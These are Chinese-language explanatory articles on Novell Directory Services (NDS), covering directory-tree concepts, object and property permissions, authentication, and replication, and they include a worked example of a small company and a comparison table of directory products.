    限定访问权限 制定用户访问的范围(权限)，约束用户的访问权限，在网络中必须构筑多道屏障，使非法入侵者不能自动进入整个系统，特别是要注意对于网络中关键数据库或敏感地区的防范。 在企业内部，通过基于NDS的应用能够严格约束用户的访问权限，能够根据不同部门对安全性的要求分别设定安全权限，将不同安全级别的部门分隔开，任何用户都不能越权越界进行访问，它仿佛在企业内部设立一道屏障。
    确认安全隐患 每个安全系统都有一定的安全防范措施，在网络管理中必须认真检查和确认安全，否则隐藏的问题就会成为系统潜在的安全漏洞，必要时须设立安全防护岗，24小时全天候动态监测，确保网络安全，同时需考虑人为因素对网络安全的影响。堡垒容易由内部攻破，因此加强内部防范和堵塞漏洞是最好的防范机制。 NDS的重要特点在于它能够保存数年运行的跟踪记录。这些日志记录相当详尽，可以通过分析这样的记录来查找网络系统存在的安全隐患，使之得到解决。把审计的工作交给基于NDS的应用也非常合适，利用目录的信息建立完整的日志和报表将大大方便网络管理员在网管工作中的“查漏补缺”。Novell为网管人员提供了一个称为ManageWise的工具，配合第三方开发工具，能利用NDS自动对网络事件进行记录、跟踪和监视，有助于防范网络设定上出现的安全漏洞，降低网络安全管理成本并减少网管人员的工作量。
    内部的安全问题 根据ICSA的报告，有80％的非法入侵事件来自于防火墙内部，这主要是目前提供的一些内部保护措施比较单一。基于NDS的安全措施能有效解决内部互访、管理维护及安全认证等问题。
    NDS能够提供切实有效的网络安全的全面解决方案，能安全地控制网络资源和用户账号以及对NDS数据库中对象属性的访问，使得网络管理员可以从一个集中点实现对整个网络的访问和安全控制。
    NDS能安全地控制网络资源和用户账号以及对NDS数据库中对象属性的访问。要查看对象，用户必须对该对象具有适当对象权限。为了查看和修改与一个对象有关的信息，用户还必须有适当的属性权限。在NDS中，对象和属性权限沿着树往下流，就如同文件系统中权限一样。当权限沿着树往下流的时候，这种权限被称为继承权限。如果你需要确保某些权限不被NDS树的某个分支所继承，可以使用继承权限筛选（IRF），IRF类似于文件系统权限筛选的概念，通过IRF，权限可以被取消并且不被获取。使用权限筛选程序，你可以指定哪种权限能被继承。如果一个指定的权限出现在列表中，那么它就可以被继承。IRF也可以用于属性权限，它与IRF用于对象权限的方法相同。在使用IRF筛选管理权限时会出现例外。如果你筛选出管理属性权限而没筛选出管理对象权限，那么从上面继承了管理对象权限的对象，不受IRF属性的影响，这是因为管理对象权限允许所有的属性权限。
    在NDS中，对象用于管理和查看目录内的对象，对象权限有五种类型，分别是Browse（浏览）、Create（创建）、Delete（删除）、Rename（换名）、Supervisor（管理）。每个对象都有一组属性，每个属性都有与它相关的权限，这些权限控制哪些用户或者其它对象可以操作属性，一共有五种属性权限，分别是Compare（比较）、Read（读取）、Add or Delete Self（增加或删除自身）、Write（写入）、Supervisor（管理）。在NDS中创建一个用户对象时，赋予用户对象本身对该对象所有属性的读取权限和对于他的注册脚本和打印作业配置属性的读取和写入权限。与每个对象都有关的是访问控制表（ACL）的属性，它列出并控制着谁具有权限以及对象具有哪些权限。如果一个对象有写入ACL的权限，那么那个对象就可以修改它的任何权限。
    安全保密服务(Security Service)永远是公司主管对企业网络管理最重要的一环，包含网络设备、系统操作平台、网络操作平台、应用软件、数据库及Internet的安全。NDS担当此安全纽带，可以串起各个层级的安全系统，创建起一道密不透风的防护网。 目录服务不仅要作为网络资源信息的存置所(network resource repository)，此目录服务还必须能作为密匙(key)的保存库并提供在此目录中的对象之间互相验证(Authentication)的功能。
    当前看来，Public Key的验证系统配合着目录服务是业界认为可行的方法，因为Public Key解决了密匙分配(Key Distribution)的难题，而在Public Key验证系统中很重要的Public Key可放在目录内供人拿来做为加密(encryption)及验证收发两方身份的真伪。Novell的NDS正是采用RSA的Public Key验证系统。当NDS成为Internet的目录服务标准时，所有的授权及保密皆可通过NDS来达成。集成新的安全功能技术，为程序开发人员及企业客户提供在企业网络的应用程序中使用先进的国际网络安全技术。此项新功能将加强NDS独特的管理能力，并且将使NetWare 成为保密商业交易的领导平台。这种基于RSA公钥／私钥加解密算法的验证服务使用私钥属性和数字签名来验证用户身份，验证是基于会话的。用户签名仅在会话期间才有效。然而用户不需要在要求使用新的服务和应用时重新授权，因为重新授权在后台自动进行。网络管理员是能够改变网络与目录配置的唯一个人。随着NDS日益成为一种通用的跨平台的Internet/Intranet目录，它的安全性将进一步显露出来。
    网络管理员可以从一个集中点实现对整个网络的访问和安全控制，他们就可以管理更多的资源，从而达到提高生产效率，降低管理成本的目的。另外，通过NDS进行安全管理，不仅具有良好的伸缩性，而且允许管理员通过某种可控的安全方式，将某些访问管理的职责予以下放，由于所有用户的身份验证都是通过NDS进行处理的，管理员无需再对分布在不同产品和目录中的大量访问控制信息和安全信息进行管理，这既减少了出错的风险，也确保了高水平的安全性能。另外，也可以通过对NDS的单一登录，实现对授权的所有网络资源的访问，而不管他们进入网络时所处的位置如何。他们可以从任何地点，通过直接连接的Lan工作站、拨号连接的Lan工作站，或是Internet连接的远程VPN客户机进行登录。单一登录也就意味着用户只需记住一个口令，从而使他们能够很快地获得其所需的资源，最大限度地提高他们的生产效率。
    基于NDS的验证要比传统的TCP/IP的安全机制安全得多。TCP/IP的安全性比较弱，主要是因为它是基于IP地段或网段的，而不是基于用户本身的。例如：如果某个职工的工作站不具有某种特殊资源的访问权限，他只要到另一个具有该访问权限的职员的工作站上去就可以了。而动态的主机控制协议（DHCP）的情况更糟，因为它的每个用户的机器地址是动态变化的，这使得这种基于标识的管理根本无法实现。NDS提供的安全性是以用户为中心的，而不是以机器或IP网段为中心。这使得管理员可以同时根据资源标识和用户标识来建立网络的安全管理。当某个用户进行登录时，系统是根据用户标识和访问授权来确定接受或拒绝其网络资源的访问，而与用户正在用来进行登录的工作站标识无关。

返回


透视Novell的NDS（概念篇）

《一键清理系统垃圾》

透视Novell的NDS（概念篇）

目录服务更是一种全新的网络思想，它把现实中的网络统一在目录的旗下，它要求人们用目录的观 念来重新看待网络。目前网络管理中的许多困难在目录的观念下将会“迎刃而解”。

    为什么目录服务将成为未来网络应用和管理的核心，首先让我们看看实际网络中的情况。
    首先，经过了十几年的发展，网络的连接已达到了相当的规模。网络延伸使覆盖面更加广阔，也使得网络中的各种设备在不断增加，网络的拓扑结构日益复杂。网络结构的这种量的变化必然会引起质的变化，质的变化也就会直接反映到网络的应用和管理上来。在过去，网络环境比较单一，管理的工作相对较少，可以采取一一对应的简单管理办法。而现在，网络环境复杂化了，网络中的用户和设备的数量较以前都有显著的增加，许多网络还是多平台的异构环境，仍然沿用旧的方式就不合理了。因为当采用一一对应的管理办法时，随着网络中对象的增长，其管理的复杂度是和网络中对象数目的增长成指数幂的关系。举个例来说，假设一个网络中只有两台计算机（C1、C2）、两个用户（U1、U2）、一台打印机（P1），需要管理的也就是这五个对象和七种关联关系。当需要加入一个用户时，对象只增加了一个，可是将增加5种关联关系。当再增加一个用户时，则需要再增加6种关联关系。可以设想一下对于一个有上百个用户的企业，网络管理将会面临非常复杂的局面。

    其次，网络将会从网络连接（Connection）发展到网络应用和网络管理，在网络中识别用户的身份（Identity）变得格外重要。有人甚至认为身份识别的浪潮将是因特网的下一个发展阶段。在目前的网络面前是人人平等的。网络无法辨别在网络上的是经理还是普通员工。而我们的社会有身份区别和严格的组织制度，人与人在社会上的角色是不同的。没有身份识别的网络会引出网络社会和现实社会的矛盾，带来许多混乱。比如：当公司的总经理正从网络上下载数据，为下午的董事会准备报告材料，虽然他的工作要重要得多，却不得不和其他员工一样去竞争网络带宽，因为网络面前大家是平等的，这位经理在职务上的优先地位在网络上却得不到体现，于是他只能抱怨网络太慢了。
    第三，其实目前的网络中不是没有身份识别，而是网络系统的各个部分中都有一套自己的身份识别系统。比如：操作系统、数据库和各种应用程序内都能建立自己的身份识别，对用户进入进行鉴别。从一定的意义上讲，这样做能够保证本应用的身份识别的有效性。但如果有一个新的应用需要建立时，问题就出现了。要么，它重新建立自己的身份识别过程，这意味着需要进行一次重复的建设；要么，就要利用其它应用的身份识别过程，可当它需要与不同应用打交道时，就要为每一个应用建立一个对应的接口。这好比现实社会中人的身份证，如果公安机关、居委会和人才市场分别给你一个身份证，岂不乱了套。其实只需要由公安机关发的身份证就够了，其他场合需要时只要用它来唯一标识就可以了。
    第四，从管理学角度来看目前的网络管理，由于缺乏有效的身份识别方法，不能在网络上进行基于策略的管理。比如，某个公司的财务部门需要每天访问股票站点获得公司股票的信息，而公司的其他部门的员工则应禁止访问这些站点。在目前的网络环境下要完全做到这一点却不容易，于是网络管理员往往采用“YES”或“NO”的管理办法，网络资源就得不到充分的利用，用户也会觉得不方便。
    目前的网络环境能做到这些吗？
    ●可以做到不让某个用户使用某台PC机吗？
    ●可以做到禁止某个用户使用某个IP地址吗？
    ●可以做到禁止某个用户使用某个交换机的端口吗？
    ●可以让用户在网络的任何一台PC上登录都可以得到他自己的操作界面，而不是其他用户的吗？
    ●可以实现在网络的任何地点登录都可以获得与其身份相当的网络资源吗？
    有了上面的介绍，答案是否定的。其中最重要的因素就是网络中没有有效的身份识别手段。网络中人的电子身份将在网络的应用和管理中起着举足轻重的作用！网络发展将进入一个网络社区的阶段，在那时身份更是成为最重要的元素。其实这些问题，并不是不能解决，而且现有的技术已经可以做到了，这就是目录服务。我们正处于因特网的下一个重大阶段的前期，这个阶段将是一个集中关注数字身份及其相互关系的创建和管理阶段，在这个时期正是我们应该应用目录服务的时候。
    目录服务是从技术的角度定义了人的身份和网络对象的关系。它是规范网络行为和管理网络的手段。可以说，目录服务是身份管理的目录服务，它把身份和各种网络对象以及他们间的关系统一到一个数据库中，为操作系统、应用程序和硬件设备提供集中的身份服务。建立一个因特网身份世界的关键在于建立能够让个人用户创建管理和保护身份的网络环境。一个基于目录服务的网络（DEN）也就是一个“有身份”的网络。正如Novell公司的CEOEricSchmidt在今年的Brainshare大会上所说：目录与身份是因特网上一个硬币的两面！身份描述了网络上有谁，而目录服务将处理这些信息，让你能够跟正确的人、正确的应用程序、正确的服务和设备连接上。
    看来是否应用目录服务，将成为新旧网络模式的分水岭，目前的网络没有统一的身份服务。没有目录服务的应用，网络管理和应用面临许多难题。于是有人说，网络有“丢失秩序的危险”。对于目前网络中的各种问题，业界也推出了许多有针对性的方案。

    “治本方能治标”。采用一种综合有效的技术才能起到“根治”的作用。目录服务如何来解决目前网络中的问题？
    目录是网络系统中各种资源的清单，它保存了网络中用户、服务器、客户机、交换机、打印机等等的详细信息。同时它还收集了这些资源之间各种复杂的相互关联关系。目录将能不断地随网络的发展而动态改变。当网络中新增一个资源时，网络管理员在目录中添加相应的数据对象以及与其它对象和用户的关系。当网络资源位置移动或更新时，网络管理员只要对相应的目录项进行移动或更新操作。目录服务为网络管理员提供了一个管理网络的手段，它将网络的实际情况与目录一一对应。这样网络管理员对资源的直接管理变成了通过目录服务来进行。用户与各种资源对象的复杂关系也交给目录服务来处理。相关的信息只需作一次的设定，以后就不需要做重复工作了。网络发展中量的变化被映射成目录数据库的数量变化。网络管理员只需集中关注他要作出的管理决定。网络中的各个子网还可以指定自己的网络管理员管理本子网内的资源，上一级的网络管理员可对下一级的网络管理员的权限进行设置。

    目录服务将身份也作为目录中的一个特定对象来处理。现实社会的各种组织都有自己的结构和层次。用户与用户之间也存在级别和身份的不同。目录可以按照企业组织的情况来设定，使它与实际的企业结构完全一致。比如V公司下属有四个部门：计划处、生产处、销售处和财务处。其中生产处又分为配件科和组装科。使用目录服务可以使网络的管理结构和单位的组织结构一致。单位的行政管理就可以通过网络来实现。当公司总经理要向计划处下发指示文件时，只要把文件拖到计划处的目录分支点，计划处的每一个员工就可以得到这份文件，避免了传统的纸张传递的办法。在现实生活中，用户对网络资源的访问权限都是与用户的职务有关。目录可以在资源与用户身份之间建立关联关系，可以灵活分配网络资源和可靠地控制用户的访问权限。当网络中的带宽、交换机的端口、IP地址的资源在目录中都建立了与用户身份的关联关系，就可以控制用户对这些资源的使用。于是，当网络带宽紧张时，公司的总经理就可以分配到更多的带宽。如果财务处的员工有访问公司财务报表的权利，那么他在其它部门的计算机上也同样可以取得报表。而其他部门的员工即使使用财务部门的计算机，也是无法看到这些文件的。
    目录服务可以为网络中的所有应用、硬件和操作系统提供统一的身份。目录服务有相应的国际标准可循。无论硬件设备、操作系统还是应用程序只要建立了标准的目录服务接口，就可以使用目录服务提供的身份服务。这样也为网络应用程序的开发提供了方便，过去需要程序员考虑的许多问题都可以提交给目录服务，从而节省开发周期和开发费用。目录服务具有扩展性，网络应用需要使用新的属性时，可以在目录中添加相应的属性项，这将为未来的网络应用开发者提供自由的空间。比如：当一个新的应用程序需要使用用户的血型这个属性时，它只要在用户记录中添加血型属性一项，这时目录好比计算机上的主板，添加应用需要的属性就如同在目录上开一个槽，然后把应用插入槽中，就完成了。由于目录服务和应用程序都是基于标准的，横向扩展则容易又灵活。目录服务提供的身份在全网络中是唯一的，不会出现多个身份并存的混乱状况。它不仅在管理上减轻了复杂度，也为网络安全带来了保障。用户在网络上的一切行为都与他的身份挂钩。无论用户何时、何地、用何种方式进入网络，他都是可以被唯一标识出的。他在网络上的任何行为都可被目录服务记录下来的，这就表明“黑客”再也别想逃脱目录服务的“眼睛”。
    目录服务能恰当地处理各种关联关系，并可以对各种关联关系进行复杂的运算，这有助于实现对网络的策略管理。网络管理员只需设定网络管理的规则，其它工作都可以交给目录服务去完成。不同的管理要求可通过不同的规则来实现，也就不存在为了限制某个时间段或某个部门，而限制整个时间段或所有用户的情况。它带来的最大好处就是可以使目录服务执行动态的、富有弹性的管理。
    其实目录服务能做到的不止是这些。它一方面增强了网络的安全性，使网络置于技术的“秩序”中；另一方面，它丰富了网络应用，带给人们一个更“美丽的新世界”。目录服务更是一种新的网络思想，他把现实中的网络统一在目录的旗帜下，它要求人们用目录的观念来看待网络。许多目前的困难在目录的观念下将“迎刃而解”。这种思想是网络思想的一个飞跃，它把OO（ObjiectOriented）的方法应用于网络中，对象化了网络上的用户和各种组件，并把他们置于一个倒置的“树”中。这种面对对象的具有层次的数据集合，是网络的一个最好表示。身份是目录中的对象，它如实地反映了现实的社会关系。于是目录和身份使网络连接的数字社会更贴近我们的生活。

返回


透视Novell的NDS（介绍篇）

《一键清理系统垃圾》

透视Novell的NDS（介绍篇）

    这种思想是网络思想的一个飞跃，它把OO（Objiect Oriented）的方法应用于网络中，对象化了网络上的用户和各种组件，并把它们置于一个倒置的“树”中。这种面对对象的具有层次的数据集合，是网络的一个最好表示。
    从总的方面来讲我们目前的网络中应用目录服务的范围还比较少，将目前的网络转向应用目录服务的网络，首先必须对目录服务有一个深刻的了解。

    产品及评价标准

    随着因特网的发展，目录服务将变得越来越重要。根据国际数据公司（IDC）最近的一份报告，在《财富》杂志公布的1000家大公司中，有80％的公司目前使用目录服务来管理他们的网络和保障网络的安全。目录服务的主要产品有：Novell的NDS（Novell Directory Service）、IBM的DSS（Directory and Security Server）、Microsoft的AD（Active Directory）以及Netscape的目录服务产品。
    在评价目录服务产品的标准中，跨平台性是非常重要的一点，因为未来的网络会日益复杂和庞大。只具有单一操作平台的网络环境将逐渐减少。真正的因特网目录服务是一个能够跨越不同操作系统，提供各种网络应用服务的软件集成层。不能对多种操作平台的支持显然将限制其应用范围。
    目录服务的分级性包括两个方面：一方面是网络对象数量上的可扩展。网络的发展速度很快，一个优秀的目录服务系统应能适应网络的增长，可以管理“无数”的网络对象。这两年，公司的相互并购是一件很平常的事，合并后的新企业的目录集将是过去两个企业原目录集的和。目录服务应该能实现两个企业目录的合并，平滑过渡到新企业的目录服务。另一方面是对象属性的可扩展性，比如，今天网络中用户对象的属性包括：名字、性别、职务、年龄等。当有应用需要使用人的血型这个属性时，目录服务可以插入血型这个属性。当然评价一种产品不能不提到它的性能，目录服务中一个重要工作是查询，查询的速度是衡量其性能的一个关键指标。
    在下表中还有两点没有提到：一个是分布性，目录是一个大型的数据库，它不可能存放在一个地方，只能采用分布的办法。目录服务中的分布技术中一个很重要的方法是复制（Replica），分布技术的好坏影响着目录服务的性能。另一个是容错性（Fault Tolent）目录服务作为一个网络管理和应用的核心控管组件，容错性是至关重要的一点。没有有效的容错保护手段，组织的网络运行就得不到保证。网络中关键组件的故障将带来巨大损失。其实容错性和分布性是相辅相承的，只有在优秀的分布方案下才能建立高容错的网络环境。
    从表中可以看到Novell公司的NDS是目前目录服务产品中成熟和领先的一种，目前，全世界大约有5000万用户正在使用它，是目录服务产品中用户数最多的一种。同时还有很多的用户在使用基于NDS的产品，如：BorderManager、GroupWise、ManagerWise和Z．E．N．Works。NDS的最新版本NDSv．8可以容纳十亿个网络对象，这个近乎“无限”的管理上限使它可以胜任任何规模的网络。而且网络中对象增长时，NDS的运行并不会减慢。

    有人说，1999年是目录年，以目录为中心的计算将会成为网络计算的标准形式。在近十年的发展中，Novell公司成功地从接受网络计算定义转为定义网络计算。那么下面就让我们来看看Novell公司推出的基于NDS的网络计算解决方案。

   ibm microsoft netscape Novell
发布情况 可以使用一部分
1999年后完全发布 1999年晚些时候或
2000年早期发布 已经发布 已经发布
跨平台性 支持多种服务器 只支持windows 2000 支持多种服务器 支持多种服务器
分级性 预计可以 有困难 可以 可以
数据标准化 是 是 是 是
系统管理 预计可以 有问题 可以 可以
网络管理 预计可以 有问题 部分 可以
应用管理 预计部分可以 不知道 不可以 可以
策略引擎 预计部分可以 不可以 不可以 部分

    基于NDS的网络计算模型

    在这个方案中，NDS将成为网络系统的核心，下至硬件设备，上至应用程序它都能很好地与相关的产品结合起来，在每一个层面上NDS都得到了广大厂商的广泛支持。无论是硬件设备、操作系统还是应用程序，NDS都能为它们提供集成的身份服务。在网络上，用户的身份是惟一标识的，各个层面不需要单独建立自己的身份系统，需要使用身份时只要从NDS中获得。这种惟一性也保证了网络运行的有效性和安全性。在硬件设备这一层上，网络中的设备不再需要通过原厂家的管理工具来管理。
    NDS能为网络管理人员提供网络设备的一个统一视图，使其能全面综合的配置网络设备，使网络的运营处于理想状态。而且，网络资源的使用也会趋于合理化，权限高的用户能够即时得到相应的资源，合理地解决目前网络中带宽分配、资源利用等问题。
    NDS是由Novell公司开发的，但它不仅仅属于Novell的网络操作系统NetWare，它已经成为了一种跨平台的网络管理工具。目前流行的网络操作系统都有相应的NDS产品。在NetWare操作系统中内置了NDS。NDSforNT可以有效的改善NT以域为中心的管理办法。Novell先后推出了NDS for AIX、Solaris和HP－UX等UNIX平台下的目录服务。对于发展迅速的Linux平台也获得了NDS的支持，不久将推出正式产品。NDS对多种操作系统平台的支持使得它能以统一的界面管理分布式的异构网络。将全球物理分布的网络建置于一个逻辑的目录树中，可以根据管理的需要，进行合并或复制。这种对异构网络的支持将大大节省网络管理的成本和提高网络的效率，使网络的存在有序化。从另一个角度讲，这种目录服务的技术将数字社会的神经———网络置于约束之中。网络应用是网络计算的最上层。基于目录服务的应用将是下一个世纪网络应用的主流。NDS屏蔽了网络结构中底层的细节，应用程序把身份识别和安全性等主要问题都可以交给NDS去处理，因而开发更加容易。目前对基于NDS开发应用程序的厂商很多，如PeopleSoft、StarVox、Tivoli等。Novell公司自己也有许多在NDS之上的产品，比较出名的有：BorderManager、GroupWise、Z．E．N．Works和ManageWise。他们的表现都十分出色。

    NDS的介绍

    Novell的目录服务———NDS是根据X．500的目录服务标准设计的。NDS采用树形结构产生一个分级的目录结构，其结构是以对象及其属性为基础的。NDS对象指用户，工作组、打印机和卷等。对象的一组信息字段称为属性，例如，用户对象的属性包括用户的登录名称、电话号码、传真号码、电子邮件地址等。用户可以通过在NDS中搜索某对象特定的属性值来确定网络对象（如打印机或另一用户等）的位置。
    NDS把目录树细分为组织单元（简称：OU），组织单元是一个逻辑单元，它是树中的一些用户和组、文件与打印机等资源对象的集合。它可以根据企业的组织结构来划分，便于形成与企业组织结构一致的网络结构。组织单元可以在目录树内进一步划分形成OU树，这样用户就能很容易的在全局目录里找到需要的对象。
    大的组织单元中还可以再划分下级组织单元。例如：可以将不同科室中的员工和设备划为不同的组织单元，而科室的组织单元又可隶属部门的组织单元。组织单元具有继承性，子单元能够继承父单元的访问许可权。NDS包含网络上每个用户对象及其它资源对象的所有信息。管理员可以将用户、工作组、打印机和卷等资源组织到分级的树结构中，按照公司人员通常访问和使有资源的方式来建立等级。管理员可以轻松地授予网络用户对各种资源的适当权限，用户则可以方便地确定其授权使用的资源的位置。当机构变化后，管理员可以很容易地对目录树进行更新以反映这些变化。例如，当一名用户从财务部调到市场部任职，管理人员只需打开两个树的浏览窗口，将相应的用户对象从财务部树中拖出，放在市场部的树中即可，这个用户对象会动态地失去财务部的访问权限，同时继承市场部的相应属性。
    在树形结构中，移动用户对象的这种拖放方法还可用于成组对象甚至结构单元。管理员可同时监视和管理多个树形结构。一个目录的树状分层结构决定于其目录树的设置。这些设置是一套系统规则，用来定义目录树结构应如何定制、哪些对象可被定义、对象可与哪些属性有关、对象应继承那些属性、以及树状分层结构中对象所处的位置。例如：一个用户对象可加以扩展以包含社会福利号码或应急联络人的姓名及电话。你可以在网络上增添如传真服务器这样的第三者服务。方法是在目录树中增添传真服务器对象及应用程序。NDS可以适应任何规模及类型的网络。即使与别的公司合并或持续成长，NDS都能轻易地、很好地配合。只需轻点鼠标即可增添新资源。加上NDS强大的复制能力，网络的扩充不会受到丝毫限制。

返回


透视Novell的NDS（特征篇）

《一键清理系统垃圾》

透视Novell的NDS（特征篇）

    似乎先进的网络带来了困惑和迷茫，人们是不是感到有点“不习惯”了？在这里，我们一再强调要用目录的观点来看待网络。无论是管理网络还是通过网络来实现行政管理，理解目录树和目录中对象与属性都是非常重要的。因为它们是现代网络的一个最好表示，能够给网络上的人一个恰如其分的身份，可以将网络上的管理视图（目录）与企业组织结构保持一致。
    因特网的浪潮推动了社会经济快速发展，也冲击了人们的思想观念。究竟是人们去适应网络的发展，还是让网络来满足人们的需求呢？现在无论政府、企业还是学校、事业单位都在忙着上网。网络的概念不再是过去由几十台电脑组成的局域网，而是全球性的因特网。网络规模的扩大和拓扑结构的复杂带来了网络管理的困难。在网上的聊天室里，我们可能不知道与自己聊天的伙伴在何处，用何方式上网。一个网络管理员若是不能确切地知道网络中每一个元件的状况是不可想象的。一张大网中，成百上千的集线器、交换机、服务器和PC机要一个一个地查点清楚又谈何容易？何况网络又随时随地地处在变化之中，每一天都可能有新的设备加入，有旧的设备淘汰。看不到网络全貌的网络管理员也就谈不上是一位“称职”的管理员。
    因特网使许多事物加上一个“e”而变得时髦起来，什么e－Commerce、e－Business、e－School等等。一个企业花大量人力、物力建设一个网络最终是为了提高企业的劳动生产率。一个企业中最常见的活动就是企业的行政管理，无纸办公、e－Office无疑是企业的一个重要需求。把行政管理工作搬到网上去，用网络信息技术取代陈旧的方式将是企业管理现代化的重要一步。网络在大家心目中更主要是一个由光纤电缆、网络设备、服务器、PC机组成的平面物理网络，它与企业组织中的自上而下的有层次的分级结构有很多的不同。如何化解两者间的差异，通过网络实现企业的行政管理便是建网之后必须思考的问题。
    网络给了每一个人一个平等的地位。可毕竟人在现实社会中处于不同的阶梯上，在工作中有明确的分工。网络赋予的平等地位与业务上的职责就会有矛盾。经理会与普通员工在网上一同竞争带宽，不需上网的员工会和需要上网的员工一样有上网冲浪的机会，不可避免地会出现资源浪费的情况。而在今天的网络中，要实现以人为本的管理并不容易。

    S公司是一家有五十多位员工的从事信息服务的公司，采用NDS组建起了比较完善的企业网络。公司下属办公室、计划、财务、销售和工程五个部门，管理员如何用NDS管理其网络?

    图1 S公司的网络

    Novell的目录采用分层式体系结构，所以常称为NDS目录树。从NDS目录树的结构最容易联想到文件系统的目录，因为它与文件系统的目录树非常相似。在文件系统中，目录的最顶层被称为根（root），所有的文件都置于根的下级。为文件树枝目录命名时，也尽可能地使之能描述其内含数据的内容。通过目录树层层展开，把树枝目录置于不同的层次上，便可以区分和组织数据（这里指文件）。在文件系统里，树枝目录不包含数据就没有实际意义。我们可以把数据看作树中的叶子节点。 NDS目录树的最顶层也被称为根（root），树枝目录是用来组织对象的，它包含了NDS的叶子对象。NDS中存储的实际数据是NDS对象的各种属性。NDS Schema定义了NDS树可以包含的对象类型、NDS对象可以包含的对象属性以及对象在树中放置的位置。访问NDS对象的方法也与文件系统中访问文件的方法十分相似。当访问文件时，我们需要指定从根目录到文件的路径。例如：\Corp\Data\Accnt\Private\ file.txt。而访问NDS的对象也同样需要指定这个对象的路径。例如：..CN=Joe.OU=Engineering.OU=Provo.O=Novell.C=US。但NDS毕竟与文件系统有许多的不同，下面就让我们从一家公司的网络来看看NDS的的对象、对象属性及结构。
    S公司的每个部门都有一个自己的局域网，工程部和计划部还有自己的服务器。整个公司设有一名网络管理员。和通常的组网办法相比，利用NDS搭建和管理网络显得格外容易和轻松。Novell的目录服务将网络中的用户和各种组件都对象化了。网络管理员只需对目录树中的对象进行操作，就可以管理网络。对象表示网络中的不同组件，如人、打印机、服务器、计算机和用户组等等。在对象中存储了网络资源的信息或数据。如在S公司中，用户包括全体员工；打印机包括工程部的HP激光打印机和计划部的EPSON针式打印机；服务器则指公司的两台服务器以及计划和工程部门的服务器；工程部下属的软件测试组、程序组用用户组来表示。公司网络中的每一个元件都能在NDS中找到适当的位置。对象属性是与NDS对象相关的不同类型的信息，它分为必须项和可选项。通过对象属性的组合定义了 NDS的对象。大多数NDS的对象属性已预定义了，用户可以直接使用。如果需要，用户还可以在对象中添加对象属性项。一个NDS的对象最多可以拥有75个对象属性。例如：在S公司的打印机对象使用的属性包括Name、Address、Location、Printer Server等，用户对象中使用的属性包括：Login Name、Last Name、Group Membership、Telephone、Fax Number等。当公司 需要使用指纹这个在定义中没有的属性时，可以随时将它加入到用户对象中，如同在数据库中添加一个字段一样方便。这个特点也能保证公司网络应用的多样化。属性值是与对象属性相关的简单名字和描述。对象属性描述了对象是什么，而属性值描述了一个具体的对象实体，如S公司工程部的激打。小王是S公司的网络管理员，NDS是如何描述他的呢？请看下表。同样，我们可以轻松地描述其他用户和网络组件。
    与每个对象相关的是权限集合，与属性相关的是属性权限，这两种权限通常都是与用户在组织中的职责和地位相关，它们限制用户对对象和属性的操作。NDS对象权限包括：Browse、Create、Delete、Rename和Supervisor。

object
property
value（s）

user
login name
xqwang

given name
小强

last name
王

title
网络管理员

location
北京，海淀区，黄庄

telephone
62284169

fax number
-

7
description
授权网络工程师

    NDS对象属性权限包括：Read、Compare、Add Self、Write和Supervisor。例如：在S公司中，网络管理员通过NDS设定财务部的用户不能使用工程部的打印机，计划部的用户则可以使用工程部的服务器。普通员工可以查询其他员工的电话号码，但不得更改。公司的每一个员工都只能在网络上进行与自己职责相当的操作，取得权限赋予的资源。用NDS创建用户对象时，可以先建立一个模板，在用这个模板去生成用户。这个功能对于S公司中经常要成立临时小组的工程部非常实用。
    NDS把网络中所有的用户和组件都对象化，并加以详细描述，现在该看看它是怎样把一个网络组织到自己的“树”下。现实中的网络虽然称为网，但实际上可以将它看成一个具有层次树形结构，网络中的各种元件就处于这个树的不同分支上。NDS正是用一个具有层次的倒置的树来表现了网络。NDS目录树由三类对象组成：根（root）、树枝目录（Container，或称为容器）和叶子（Leaf）。根对象处于给定目录树的顶级，而分支树枝目录对象内部是叶子对象。根对象是在首次安装NDS时自动创建的，不能改名或删除。在一个给定的NDS树中只能有一个根对象，在S公司的网络中，根直指公司的名称，树枝目录对象通常根据公司的位置、分支、部门或工作组来命名，它使得你能将NDS对象表示的网络元件组织到目录树中，NDS树中的分支或子树由一个树枝目录对象和它下面所有的对象组成。树枝目录对象提供了一个逻辑组织NDS树中其它对象的方法。S公司的二级单位计划部、财务部、办公室等都是NDS中的树枝，它们处于根的下方，但彼此平行。在工程部中还可以根据需要建立小组。叶子对象是单实体对象，它们不包含其它对象，它们与实际的物理实体，例如用户、服务器和打印机相对应。叶子对象用CN=（普通名称Common Name）表示。其实NDS完全将S公司的行政结构搬到了目录树上，目录与组织的结构完全一致，用户根据其职务和身份分布在目录树的不同层次上。实现行政管理也就非常容易了，同时公司管理可以作到以人为本，小王分配给马经理更多的带宽，使他上因特网更快些，办公室的其他员工则不能上因特网。所有的资源都做到按需分配，NDS把网络治理的井井有条。
    Novell公司提供了一个在WINDOWS下的程序NWADMIN，通过它可以建立对象，选择对象属性并为其指派属性值。在此程序中，对象用图标表示，例如用户对象图标。有合适权限的管理员可以建立新的对象或选择一个已存在的对象（选择与那个对象相关联的对象属性并指派属性值）。在NDS v8中可以使用称为ConsoleOne的管理工具。这些管理工具能随时迅速准确地向管理员提供企业网络的完全视图和网络资源的详细信息。S公司的小王只要坐在自己的电脑前就可以配置网络上的各个组件，查看日志文件获取网络运行的情况，甚至可以向各个客户端派发应用程序，作Y2K的测试。一切工作都不需要他挪动半步。

    作为网络管理和应用的核心控管组件，目录服务是一个包容网络中所有用户和元件的大型数据库，它不可能存放在同一个地方，怎么做呢?

    图2 NDS树样例

    在前面介绍目录服务的评价标准时，我们指出分布性和容错性是评价目录服务产品的重要标准。目录服务本是一个大型数据库，由于其存放信息的重要性，一旦出现意外灾难造成数据丢失，损失将是巨大的。网络的分布性结构决定了只能采用分布的存放方式，将信息尽可能的靠近使用它的用户和设备，这样才是合理和有效的。NDS是通过分区和复制的办法来实现分布和容错的，每个分区都包含整个NDS目录树的一部分，它们能存储在网络的不同服务器上，每个树可以有一个或多个分区，分区可以提供更快的搜索和更高的的可靠性。一个NDS分区的复制品是原始分区的镜像拷贝。在NDS中采用复制品可以消除任何NDS单点故障，从而为NDS全局分布数据库提供容错。复制也使得NDS的数据库能尽可能地靠近需要使用它的用户，提高广域网用户对NDS信息的访问速度。S公司的网络充分利用了NDS的分区和复制功能，工程部和计划部的信息存放在自己的服务器上，但同时在公司的服务器上建立了复制。两个服务器CS1和CS2互为镜像拷贝，当其中一个作硬件维护或软件升级时，其承担的服务自动切换到另一个服务器上，公司的员工仍能登录到网络上，获得需要的信息。
    最后给出利用NDS树搭建和管理网络的几点体会：
